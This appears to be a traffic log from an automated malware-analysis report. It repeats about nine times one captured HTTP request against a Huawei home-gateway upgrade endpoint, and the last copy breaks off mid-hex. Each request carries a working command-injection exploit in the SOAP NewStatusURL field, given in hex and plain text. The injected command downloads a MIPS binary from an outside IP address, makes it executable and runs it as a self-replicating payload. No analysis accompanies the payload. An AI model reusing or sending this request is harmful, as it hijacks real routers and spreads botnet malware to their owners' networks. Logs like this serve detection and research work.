          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 